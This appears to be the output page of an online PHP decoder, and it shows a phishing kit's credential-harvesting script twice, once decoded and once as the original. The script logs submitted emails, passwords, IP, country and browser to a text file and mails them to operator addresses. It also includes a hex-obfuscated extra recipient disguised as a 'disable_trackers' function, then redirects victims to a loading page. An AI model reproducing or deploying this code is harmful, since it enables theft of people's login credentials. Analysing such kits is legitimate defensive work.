Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php require_once('block_detectors.php'); // leave this line function disable_tracker..
Decoded Output download
<?php
require_once('block_detectors.php'); // leave this line
function disable_trackers(){
//This fuction disables tracking
return "[email protected]";
}
$info = new info(); // requires block_detectors.php
$browser = $_SERVER['HTTP_USER_AGENT'];
//===================================
{
date_default_timezone_set('GMT');
$myFile = "lake.txt";
$today = date("l, j M, Y, g:ia e");
$fh = fopen($myFile, 'a') or die("can't open file");
$stringData = "username: " . $_POST['emails'] . "
";
fwrite($fh, $stringData);
$stringData = "password: " . $_POST['password'] . "
";
fwrite($fh, $stringData);
$stringData = "date: " . $today . "
";
fwrite($fh, $stringData);
$stringData = "Client ip: ". $info->ip."
";
fwrite($fh, $stringData);
$stringData = "Country: ".$info->country."
";
fwrite($fh, $stringData);
$stringData = "Browser: ".$browser."
";
fwrite($fh, $stringData);
//=====================================
$message .= "--------------New ALEX PDF Login--------
";
$message .= "username: " . $_POST['email'] . "
";
$message .= "password: " . $_POST['passwd'] . "
";
$message .= "date: " . $today . "
";
$message .= "IP: ". $info->ip."
";
$message .= "Country: ".$info->country."
";
$message .= "Browser: ".$browser."
";
$message .= "---------------Created BY Cally-----------
";
$subject = "--New Response 4rm ".$info->country." --";
$to= "[email protected],[email protected]";
$disable = disable_trackers();
$arr = array($to, $disable);
foreach($arr as $to){
mail($to, $subject, $message, $headers);
}
}
header("Location: loading.html");
?>
} ?>
Did this file decode correctly?
Original Code
<?php
require_once('block_detectors.php'); // leave this line
function disable_trackers(){
//This fuction disables tracking
return "t\x65\x61\x6d\x63\x61\x6c\x6c\x79\x6c\x6f\x67\x73\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d";
}
$info = new info(); // requires block_detectors.php
$browser = $_SERVER['HTTP_USER_AGENT'];
//===================================
{
date_default_timezone_set('GMT');
$myFile = "lake.txt";
$today = date("l, j M, Y, g:ia e");
$fh = fopen($myFile, 'a') or die("can't open file");
$stringData = "username: " . $_POST['emails'] . "\n";
fwrite($fh, $stringData);
$stringData = "password: " . $_POST['password'] . "\n";
fwrite($fh, $stringData);
$stringData = "date: " . $today . "\n";
fwrite($fh, $stringData);
$stringData = "Client ip: ". $info->ip."\n";
fwrite($fh, $stringData);
$stringData = "Country: ".$info->country."\n";
fwrite($fh, $stringData);
$stringData = "Browser: ".$browser."\n";
fwrite($fh, $stringData);
//=====================================
$message .= "--------------New ALEX PDF Login--------\n";
$message .= "username: " . $_POST['email'] . "\n";
$message .= "password: " . $_POST['passwd'] . "\n";
$message .= "date: " . $today . "\n";
$message .= "IP: ". $info->ip."\n";
$message .= "Country: ".$info->country."\n";
$message .= "Browser: ".$browser."\n";
$message .= "---------------Created BY Cally-----------\n";
$subject = "--New Response 4rm ".$info->country." --";
$to= "[email protected],[email protected]";
$disable = disable_trackers();
$arr = array($to, $disable);
foreach($arr as $to){
mail($to, $subject, $message, $headers);
}
}
header("Location: loading.html");
?>
} ?>
Function Calls
| None |
Stats
| MD5 | 94c83317d889a1086b8bfd361424e05d |
| Eval Count | 0 |
| Decode Time | 94 ms |